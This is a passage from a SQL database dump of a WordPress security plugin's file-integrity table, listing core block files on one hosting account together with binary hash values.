('ÐÍu|¾=:£1¾çÒvø', 'wp-includes/blocks/post-excerpt/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-excerpt/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '©	“<ë•Ð\r''w9zR', 'OšFsoKL*Õ(\nÖbâ`†fNXƒsSÔš†\\S¡]', '', 0, '?'),
('¯\ni_¿a*„‰>½dnP', 'wp-includes/blocks/post-excerpt/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-excerpt/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Í€/“-\0I]T~ÇÒ ¸Ø', 'þÓaŸð›ç&ÂjfÀ#‚\Z-CxçåWOèéòn¯Õpj', '', 0, '?'),
('ÒÄÏéÓ6=™‚Ì•', 'wp-includes/blocks/post-excerpt/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-excerpt/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'eÌ…ü¶bJü&ïŠŽ^Å§', '™—•©‹ýš2u¼…	ëlõx¿Díg¾/ëvºÙ', '', 0, '?'),
('XØÜN¡½8„jøƒ³¢cù', 'wp-includes/blocks/post-excerpt/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-excerpt/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Í€/“-\0I]T~ÇÒ ¸Ø', 'þÓaŸð›ç&ÂjfÀ#‚\Z-CxçåWOèéòn¯Õpj', '', 0, '?'),
('a‚w™UÌð\ZTzºK„', 'wp-includes/blocks/post-excerpt/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-excerpt/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'eÌ…ü¶bJü&ïŠŽ^Å§', '™—•©‹ýš2u¼…	ëlõx¿Díg¾/ëvºÙ', '', 0, '?'),
('½¨úô¤øBÃJ¨<«`õ¢', 'wp-includes/blocks/post-excerpt.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-excerpt.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hSýL.gý´B„«Ð:†Þ', '‚dú•öÇ £#$ŸÿAY>jc»¡1‡¨5g=^£Õ', '', 0, '?'),
('\n	M«I†~öYEO—×]×', 'wp-includes/blocks/post-featured-image/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-featured-image/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\0äù°œ˜ÿst#Ê>‰Y', 'SÈrÔPCLEÒ‚1NÏ9•÷±&¢Â¶ˆ„»O,>Q,Ð', '', 0, '?'),
('f‰FâõAŽ£lû‘UpýðØ', 'wp-includes/blocks/post-featured-image/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-featured-image/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'zC,`Ñ›¡@èm‘â^R', '‹ï³´”¸³§tÁæytü¥g.^<¨õÕî:"J†¸<', '', 0, '?'),
('LÂßï·E¦ïgÏýâÖF9', 'wp-includes/blocks/post-featured-image/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-featured-image/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '~C±þç9<€|pîÐu', 'QJ^*¥p£À° ˆk]ÜZhÉ§#—“xKˆÀà', '', 0, '?'),
('¤«“ÃmëìÓŸaÖÄÔÍ', 'wp-includes/blocks/post-featured-image/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-featured-image/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '/4³+vƒ²–ÖYÃbbÇÕ', '¬ÌõßR¢Kx4küÀê»Äê*Dûü\0K;oYgÍ<', '', 0, '?'),
('ôwß>dÂŒ?d…', 'wp-includes/blocks/post-featured-image/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-featured-image/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'œº÷åž§ÖU×tHEï', '7„î.íF|dn2A@ÞÛôî€WJN»ˆWÄ‰', '', 0, '?'),
('–ôz¸ÜJ/ÄB&C™%', 'wp-includes/blocks/post-featured-image/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-featured-image/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'DŒ÷ŒJæ/=×9K/z', '±„‰HÿÈê3íM<ï$Š½2ûNr•á>¢ž8."õ', '', 0, '?'),
('ä,°Ò*iV¨O1aß\n3ë', 'wp-includes/blocks/post-featured-image/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-featured-image/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'bLsm¸pŽç¸ªétMê', '"-è=[nÀ>÷á=æ(`«­&cØÄ¼Cüº¾†ýi', '', 0, '?'),
('›Ã{ü›{8B%@\0ˆxÐ', 'wp-includes/blocks/post-featured-image/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-featured-image/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'DŒ÷ŒJæ/=×9K/z', '±„‰HÿÈê3íM<ï$Š½2ûNr•á>¢ž8."õ', '', 0, '?'),
('¼Ÿ¦rsaêÐÛ9SUU¨ê', 'wp-includes/blocks/post-featured-image/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-featured-image/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'bLsm¸pŽç¸ªétMê', '"-è=[nÀ>÷á=æ(`«­&cØÄ¼Cüº¾†ýi', '', 0, '?'),
('Òj¸i±é õ\nTÛæ§¿\r', 'wp-includes/blocks/post-featured-image.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-featured-image.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Iº‡qZ§º”}˜Ï0³²ú', 'æªNV¨É@	ÆªíªÐª¥› %êg^YŠR}Nb>Q', '', 0, '?'),
('H|\0`B£•Öðœ*²Q¬—', 'wp-includes/blocks/post-navigation-link/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-navigation-link/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§¢ÇÂÔPŠ7kÄõ µýF', '‰ƒA"+‘5L)ëqÏ³~{ú›:£<²´Óz Øáú', '', 0, '?'),
('üü/Žøê[§»/Ö¿Z', 'wp-includes/blocks/post-navigation-link/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-navigation-link/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\nRÄ(zôJ©,Îq3ãýò', 'G`	0tœªæÒÔ„ô?S''î$ï–\n­?*ÛLà', '', 0, '?'),
('Î³y\0¯6ÓÏ›\0€^	=@', 'wp-includes/blocks/post-navigation-link/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-navigation-link/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ƒCüêb›r¬†¼µ’:Ø', 'A„ùùÎ!¶D”gíõ$µ;è~³Ùºo²“£îP;{', '', 0, '?'),
('‚uWÛ“±WPÔ^ÿ‡(L¿', 'wp-includes/blocks/post-navigation-link/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-navigation-link/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'O³¨£vSi?\0ÓÃ‚(˜†', '±Å¶C˜Ï­›hö©ÚF0:2¡Iù´vš¢¼\ZùÀõôT', '', 0, '?'),
('€ž#³ˆ\\7’¦\ZhGžl¢', 'wp-includes/blocks/post-navigation-link/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-navigation-link/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'õ\r[óu»è×€?­vFq!u', 'Í–R‰ø¾/(+"	~$W¤¥\r@]c=¯@Jw\ZG', '', 0, '?'),
('ûÿîá?i.Q¿[ ŽEá', 'wp-includes/blocks/post-navigation-link.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-navigation-link.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '?0ï•UQ$N4Øì‘)Ð', 'ùlvžãµK"pñºÉÿ±óÇg\\±ø6Ë''º', '', 0, '?'),
('%f‹Nvn9Â,\rÍW', 'wp-includes/blocks/post-template/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-template/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ä¹4¸Uu\nYi¾É', 'ðØ&s´ýhˆ¢†o–@èvâ\ZÃf¨z©=l¹»_K', '', 0, '?'),
('sD‡‡‹ùËìI6Š„|Uö_', 'wp-includes/blocks/post-template/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-template/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'KkD§''Ê™2€À‰Ô', 'ÖE¬2ì°;+i_ÐßÀÐ«Bãà;l*.ò²ßBº', '', 0, '?'),
('šMÌ}Àn¢"4jdüR§ð', 'wp-includes/blocks/post-template/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-template/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@ÃƒNÊ…\níN;,k0íf', '‹¤	CJ÷ÿ-ãjö®"ôÍXUëZš‘ÉuÞŸßÈ±­ð', '', 0, '?'),
('*&5,qV×·0vµc', 'wp-includes/blocks/post-template/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-template/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£ÝLXà¼#Rºï\ZÀü<', '=õN«BÊÙ]¢þÔu9„Ëa™¶Û+µ855#˜Öp', '', 0, '?'),
('ÎO>âPwœ^ûYÀÊXì', 'wp-includes/blocks/post-template/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-template/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'pÙ9ýÂ¿ð(Vqˆµ$', '’$ÉU‹Ò$çgú@º¹ÔðIt­6ö<I£úƒê!ã*«', '', 0, '?'),
('\0ív¹ˆ®‹Ø¦£Þñ÷Ýž', 'wp-includes/blocks/post-template/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-template/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­0ðXð¡ `õ=Õçq', '«›Úâ­D?#¨Œ"ôcdhËäYæ=6	òë1ˆ', '', 0, '?'),
('Úš§éÞ´¬¤˜ëÐu_Þ', 'wp-includes/blocks/post-template/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-template/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '´ŸÌ!ÆÂÔ$,m-F‚¯x', 'Eg5j¬ÜÑa#]\Z»á§¬G&Wß½è…S€…µ…UB¤', '', 0, '?'),
('z\0µÌ3hŠ—Úd›*', 'wp-includes/blocks/post-template/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-template/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '$ªùô‹Ïp“ÉkC1', '}ÓQ9co›¬RÛúÇKH>0®\nåHLÙ^ªWáïØ‡É', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('Eù¢s=¢]šŠ”º’=a', 'wp-includes/blocks/post-template/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-template/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÿ\rnEë³Ç <•Wb¿Wÿ ', '“ñ	o\\\Ze­Ja*óLå¤ïÕÓØž[C‡¡¬6ø Ù', '', 0, '?'),
('&3˜Ì9Q&m·ÞOc…Q', 'wp-includes/blocks/post-template.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-template.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'öÑ\nëÎX0Á*Ñ4¢', '®Áé\\a*zK*+úOØèMºL¨íÒÿW¾H¨_', '', 0, '?'),
('>¦o«ÚÃÄëú»ÊtÎÀ+', 'wp-includes/blocks/post-terms/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-terms/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ô_¶''h¼&äÿ\\Ó¡Hµ', '»%l’¨ï=7šçv…~ˆÂFoqàãÂkÇ>ž', '', 0, '?'),
('v>\n™ŠA?íU’ÜÂ(Îø', 'wp-includes/blocks/post-terms/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-terms/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷°4¢Åá’ëà×"héƒ', '¢@£\Z''ê_þ±:³Òï‡eš$Ó)ênÌF', '', 0, '?'),
(';Q}]]UÅK}9oé¢éì', 'wp-includes/blocks/post-terms/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-terms/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ã\Z^k†ÜN¶Ò±î\Z )Ÿ', 'Ý?¸óã··ñ¿(s¬º¨''×Ë­¥#ñl<šRTô‡e', '', 0, '?'),
('†&ð¯§o]§Óú3+§g', 'wp-includes/blocks/post-terms/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-terms/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷°4¢Åá’ëà×"héƒ', '¢@£\Z''ê_þ±:³Òï‡eš$Ó)ênÌF', '', 0, '?'),
('û cðOÍñÀÇà4Ä¨Ç–M', 'wp-includes/blocks/post-terms/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-terms/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ã\Z^k†ÜN¶Ò±î\Z )Ÿ', 'Ý?¸óã··ñ¿(s¬º¨''×Ë­¥#ñl<šRTô‡e', '', 0, '?'),
('¼©‘ëØãvÍyLÔÂe¥í!', 'wp-includes/blocks/post-terms.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-terms.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'åV²®lÏ''/’ÖÐödˆ', '\0‰ci0«Cb»Èm÷ƒ_IUUÏûŠ¸ÍFý=ßm]²ì', '', 0, '?'),
('pÅ§–\né‚+Rà2ZÕç¾b', 'wp-includes/blocks/post-title/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-title/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '/nR''ãÑÝòy\\@Võ', 'ÔþIjž4ÈÀVÑ=Ó˜åÉG¼Ø\r\Z¹²‰/T¦+', '', 0, '?'),
('åseþ¬ŸQr^TèKù', 'wp-includes/blocks/post-title/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-title/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶úõìÖ8X‹èoYc', 'o’W Bx½ßpºû…Õ''.uZ^ò‡Ê2cˆ´±€', '', 0, '?'),
('¢êÕr£Ý¨N(€´Mí\\', 'wp-includes/blocks/post-title/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-title/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ã}°þÈkRp×$²œ‡Å¶', '.‰Âµ&;ÔiË¸Ì`Œ?tÒ\rI3ãÏ“L&<áÞ', '', 0, '?'),
('Â’¥µe­î7”FÓ%', 'wp-includes/blocks/post-title/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-title/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶úõìÖ8X‹èoYc', 'o’W Bx½ßpºû…Õ''.uZ^ò‡Ê2cˆ´±€', '', 0, '?'),
('Ã\rµW$2lv9{Ü­:„Ù', 'wp-includes/blocks/post-title/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-title/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ã}°þÈkRp×$²œ‡Å¶', '.‰Âµ&;ÔiË¸Ì`Œ?tÒ\rI3ãÏ“L&<áÞ', '', 0, '?'),
('Xg#»m\rfšjž7m®^', 'wp-includes/blocks/post-title.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/post-title.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’YÍ×vpõ°@6.ô¯e', 'U9ÎæÕ-@˜ËB4AÒ£57QÚã?{»šËü_æ', '', 0, '?'),
('%í¬]MÛ3¨T¶1T¸ã/', 'wp-includes/blocks/preformatted/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/preformatted/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'º­TÄ’Ã+™¦Eû^õg[', 'ç¥0(_Œl\ZíÌ•Ö:ù‡¡èÆþ¼;†J§!r¦', '', 0, '?'),
('(0ó0k9Y¿˜¡ãA®®\Z', 'wp-includes/blocks/preformatted/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/preformatted/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'çOoJ}[¯Œ×»õ¥ÁWŠÉ', '›¿m€äãA-¶ä`’8Çï	£P aÔyí<ð(œî', '', 0, '?'),
('¨"¦sybNl-¼×”', 'wp-includes/blocks/preformatted/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/preformatted/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰S²ü»GÔ{Äˆ]ù5×1', '_Ÿ£­pc)kéêË3YHL¶IWO…P]9ôt×S', '', 0, '?'),
('òL>Ë;µ*	ª¹YÛžm', 'wp-includes/blocks/preformatted/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/preformatted/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'çOoJ}[¯Œ×»õ¥ÁWŠÉ', '›¿m€äãA-¶ä`’8Çï	£P aÔyí<ð(œî', '', 0, '?'),
('é»cï8ÿïx«ïåÏµ', 'wp-includes/blocks/preformatted/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/preformatted/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰S²ü»GÔ{Äˆ]ù5×1', '_Ÿ£­pc)kéêË3YHL¶IWO…P]9ôt×S', '', 0, '?'),
('PðŸH­ßZ`â=¼²', 'wp-includes/blocks/pullquote/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '/Î;‡Â1&¦	< LŠÞð;', 'ŽNi?ñ)B:¼7É²\\©7ú\0''b8âðg£ÍiÂ†', '', 0, '?'),
('Zç*Ô·ª!ö"E\ZŸ@', 'wp-includes/blocks/pullquote/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'å´³±ÁÈJ¾‡Ú}”Y', 'ÍFF8ßQÎ‘yÞ–/­ËW-Í£¦Ã+÷›¾äK[í¥', '', 0, '?'),
('´âŽM‚ª{x¸JÇH£”', 'wp-includes/blocks/pullquote/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'áiÔ}–}Oa¾X`£', '5hž3DÙ	¢±!­Ð£ô^IÖun+ ƒ‘/Ù_¾u', '', 0, '?'),
('3’„¿X´G%<!>', 'wp-includes/blocks/pullquote/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'å´³±ÁÈJ¾‡Ú}”Y', 'ÍFF8ßQÎ‘yÞ–/­ËW-Í£¦Ã+÷›¾äK[í¥', '', 0, '?'),
('Óþ?H4©Vªˆ‰­\nƒÎ', 'wp-includes/blocks/pullquote/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'áiÔ}–}Oa¾X`£', '5hž3DÙ	¢±!­Ð£ô^IÖun+ ƒ‘/Ù_¾u', '', 0, '?'),
('xÙ.½¦ŒXóëJ$§É®Ü¹', 'wp-includes/blocks/pullquote/style-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/style-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'þ§º“ÜEüKð;±Gõ‘¸', 'šW$CÞ½nÇléãò{±£–ÂLÞØÇ¬\\ßa²@', '', 0, '?'),
('ZA£Pçð¾ºz›¤¯Ñ', 'wp-includes/blocks/pullquote/style-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/style-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ñgMk“Ó´˜±Œ³£é1ü', '·¶´7A˜d5–x¡™q³R\rÚn\0S™·¥gÁÞ\r', '', 0, '?'),
('r¼­“"þ‚%1}/2Y¬', 'wp-includes/blocks/pullquote/style.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/style.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '8Pþ¸þRÎ[uN6æ‹Ý\n', '•Ž;“°Ë$‹£¼wµ‡Cè½.½\\}8é!:Š', '', 0, '?'),
('UAØQµ,U¬–q×ÞÄ', 'wp-includes/blocks/pullquote/style.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/style.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÓŠû‹-«£=/$-[â', '	Ê"ª{=àáí56æø0ÊyHˆßaE1½“7òpÇ¸Î', '', 0, '?'),
(' \réžø·-èUzœ\rþaK', 'wp-includes/blocks/pullquote/theme-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/theme-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„¹TÖ_W¿1ý«="ê0', '%8!KHÓ„B€	š¯E\r<ß¬¢áwX<†¬øWî', '', 0, '?'),
('Å‡5]Á‡dxvý:Ü', 'wp-includes/blocks/pullquote/theme-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/theme-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hRË<UGªÙûtÚ', 'Ažoi^ø—®<h+F–yáQÔ¡æNo­Áx]L4ÑO', '', 0, '?'),
('|.]Óñ°ˆ0Û´', 'wp-includes/blocks/pullquote/theme.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/theme.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„¹TÖ_W¿1ý«="ê0', '%8!KHÓ„B€	š¯E\r<ß¬¢áwX<†¬øWî', '', 0, '?'),
('L–ó‰Õ»Ë»vMlW«ždœ', 'wp-includes/blocks/pullquote/theme.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/pullquote/theme.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hRË<UGªÙûtÚ', 'Ažoi^ø—®<h+F–yáQÔ¡æNo­Áx]L4ÑO', '', 0, '?'),
('?ðË|êº¯÷×~x“ÐëÖ', 'wp-includes/blocks/query/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'úç÷]>çyH(žë\ZÛac', 'v¦vëÏÎu—Âo(Ìi±¥Ýì­¿F”|N<¶\rW', '', 0, '?'),
('ýÉÚ!|MWk¡òpr³', 'wp-includes/blocks/query/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '—¬Ødø\0ŽãÕçy¡Ï„', 'ïñFcÖ~ŒÚQTÙAdÇµŠSç»«ÃY/\Z&©×F', '', 0, '?'),
('tž»íRËÄOLZÌöÆÈå''', 'wp-includes/blocks/query/editor-rtl.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query/editor-rtl.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'û¶àçeü€Ý_LdsMÔ', 'I“¶!ƒí­è	Ù#<pw.Ãç÷óöíÛR¤Ç÷;0Lµ/ø', '', 0, '?'),
('"îDã±Z~\0ò|3Öõß', 'wp-includes/blocks/query/editor.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query/editor.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ëò‹‡¸Çõ''!\rYD_š', 'ü&qÀëOB¿î}Ãì@1Œ?¯Ü{Â3„°—¶>-=ç', '', 0, '?'),
('àXLˆt¿ž£ÎCc-¯—', 'wp-includes/blocks/query/editor.min.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query/editor.min.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\\U\nëû#¦óó]x×Hu­', 'vÔgÓÄô?. uÂêÓnãXAŸ²×¼ò&½§J', '', 0, '?'),
('së×&^"WßÅÀºD=À', 'wp-includes/blocks/query/view.asset.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query/view.asset.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡xIS¹˜_t¥©Þ\\Ï%^', '¡\\Z‰žó?;\n±·4c¶wMz™:Ž`‰?0jº,N#êš', '', 0, '?'),
('õ¨õòH£©Ló»<€Ì‘5', 'wp-includes/blocks/query/view.js', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query/view.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7P×íñUDjCX^Fæ×', 'ÈXÙüð„BŽ±R{Ê±¸¸æöfJ.p®T&', '', 0, '?'),
('Ñ›×XÊC‹ÛlBÈ†,ç', 'wp-includes/blocks/query/view.min.asset.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query/view.min.asset.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹õû5UéìHÄ ¥†õ\n¦', 'Ë­w\0tzw½ªºF²á7”Ç¢‡¤XÎž§S¤¹u#t', '', 0, '?'),
('…Š†9ä}#§ÇÆº', 'wp-includes/blocks/query/view.min.js', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query/view.min.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„4€‰\n5Å~KáÇ''|×', '\r“©ñC¡¿ì¤¢(ÈlÜ¶mÝˆ<í…½¢´Å“ZÚçÈ', '', 0, '?'),
('É1°à¬9WuÞÓ€4B«', 'wp-includes/blocks/query-no-results/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-no-results/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ý!dÃsŒ¦Ä¡oùÚÐ·Ý', 'ÐÔ@ßú~Ñ¤ÇyÉì+ŽN\Z×!°§ÈæöÀALf', '', 0, '?'),
('œõBÂ3\r·qelï±Lú', 'wp-includes/blocks/query-no-results.php', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-no-results.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÝÕ<–\\ëhRyZg­R', 'íáœ¤âaCR!i‰ì^í)L81êAdíb4D®é%e', '', 0, '?'),
('û¶ÉÁ''ÍßVBÁ~þw', 'wp-includes/blocks/query-pagination/block.json', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination/block.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'í×í €zó\Z×Ò.ó‹ø', 'ˆË\nh(nq‰µ(êWn÷ÔCòk¸ßïO46', '', 0, '?'),
('TÅÙ`5™¹È2z/>àšw', 'wp-includes/blocks/query-pagination/editor-rtl.css', '/home/equipm11/public_html/happythinking.com/wp-includes/blocks/query-pagination/editor-rtl.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÌŒþ\\ÛæÂÈßSÀN5JÆ', 'ÿ7:NyI¾ñN[ªg4¬Æ ÞºO ã}qF', '', 0, '?'),
